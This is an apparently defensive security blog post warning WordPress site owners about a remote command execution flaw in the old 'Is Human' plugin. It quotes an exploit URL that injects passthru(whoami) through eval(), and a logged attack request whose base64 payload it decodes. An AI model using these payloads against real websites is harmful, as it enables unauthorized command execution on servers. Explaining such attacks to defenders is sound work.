Old “Is Human” WordPress Plugin Still on Cybercriminals’ Hit List

Cybercriminals search for Is Human WP PluginJust because something isn’t readily available anymore doesn’t necessarily mean that someone isn’t out there searching for it.

Take the “Is Human” WordPress plugin, for example.

It’s no longer available for download, no longer supported by its developers, and yet cybercriminals are still scanning websites hoping that someone still has it installed.

Why? Because versions 1.4.2 and earlier suffer from a remote command execution vulnerability. Below is a write-up from the corresponding exploit-db entry:

The vulnerability exists in /is-human/engine.php.

It is possible to take control of the eval() function via the ‘type’ parameter, when the ‘action’ is set to log-reset. From here we can run out own code.

In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.

Execution running the linux whoami command:

http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

We recently experienced attempts to exploit said vulnerability on our website, all of which failed because we don’t use this plugin – not to mention they used the incorrect filepath. All attempts originated from the same (U.S.-based) IP address:

/blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7Cm
VjaG8g
Jzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBh
c3N0aHJ1KGlkKTsK))&type=ih_options()

The  base64_ decoded text is:

$s=php_uname();
echo ‘<br>’.$s;

echo ‘<br>’;
passthru(id);

Obviously this post serves as a warning to anyone that may still have this plugin installed on their WordPress website. Cybercriminals will attempt to exploit any vulnerability – old or new – to cause mischief and mayhem.

WordPress is a popular CMS, and it’s important that anyone running it keeps the platform and any installed plugins up-to-date.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

This entry was posted in Computer Security and tagged , , , , , .
Follow any comments here with the RSS feed for this post. Trackbacks are closed, but you can post a comment.

© 2014 Hyphenet, Inc.
1761 Hotel Circle S, Suite 350, San Diego, CA 92108

All rights reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited.

Hyphenet IT Security Blog located at 1761 Hotel Circle South, Suite 350 , San Diego, CA . Reviewed by 91 customers rated: 3.8 / 5